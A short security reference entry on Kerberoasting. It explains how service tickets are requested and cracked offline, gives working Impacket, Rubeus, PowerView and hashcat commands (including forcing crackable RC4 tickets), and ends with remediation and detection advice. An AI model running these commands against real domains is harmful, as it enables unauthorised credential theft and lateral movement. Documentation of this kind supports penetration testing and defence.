Kerberoasting

Description

Kerberoasting targets service accounts by requesting Kerberos service tickets (TGS) that are encrypted with the service account’s key (derived from its password). Attackers capture these tickets and crack them offline to recover the underlying password. Because many service accounts are long‑lived, run with elevated privileges, and have weak passwords, Kerberoasting remains a high‑impact, low‑noise attack path. Tickets encrypted with RC4 (NTLM hash) are especially susceptible to cracking.

Examples

Requesting Crackable Service Tickets (Impacket)

Enumerate SPNs and request TGS tickets for offline cracking:

GetUserSPNs.py corp.local/user:Passw0rd! -dc-ip 10.0.0.10 -request -output kerberoast_hashes.txt

This writes $krb5tgs$ hashes suitable for cracking.

You can also list SPNs using native tools:

setspn -Q */*
# Or PowerView
Get-DomainUser -SPN | Select SamAccountName,ServicePrincipalName

Requesting and Injecting with Rubeus

From a domain-joined host, request tickets and save for cracking:

Rubeus kerberoast /nowrap /outfile:kerberoast_hashes.txt

Crack the hashes with hashcat (mode 13100 for Kerberos 5 TGS-REP RC4-HMAC):

hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --username

Recovered passwords demonstrate weak service account hygiene and enable lateral movement.

Targeting specific encryption types

Prefer requesting RC4 tickets (if enabled) because they are more crackable:

Rubeus kerberoast /nowrap /rc4opsec

Remediation

  1. Move services to managed identities
    • Use gMSA/MSA with automatically rotated, long random passwords.
    • Remove interactive logon and reduce group memberships for service principals.
  2. Enforce strong crypto and password quality
    • Prefer AES‑only for Kerberos; disable RC4 where possible (domain functional level permitting).
    • Set long, random passwords on legacy service accounts and rotate regularly.
  3. Minimise and review SPNs
    • Remove stale SPNs and avoid over‑privileged service accounts (never Domain Admin).
    • Monitor 4769 for unusual TGS requests and RC4 usage; alert on spikes and rare requesters.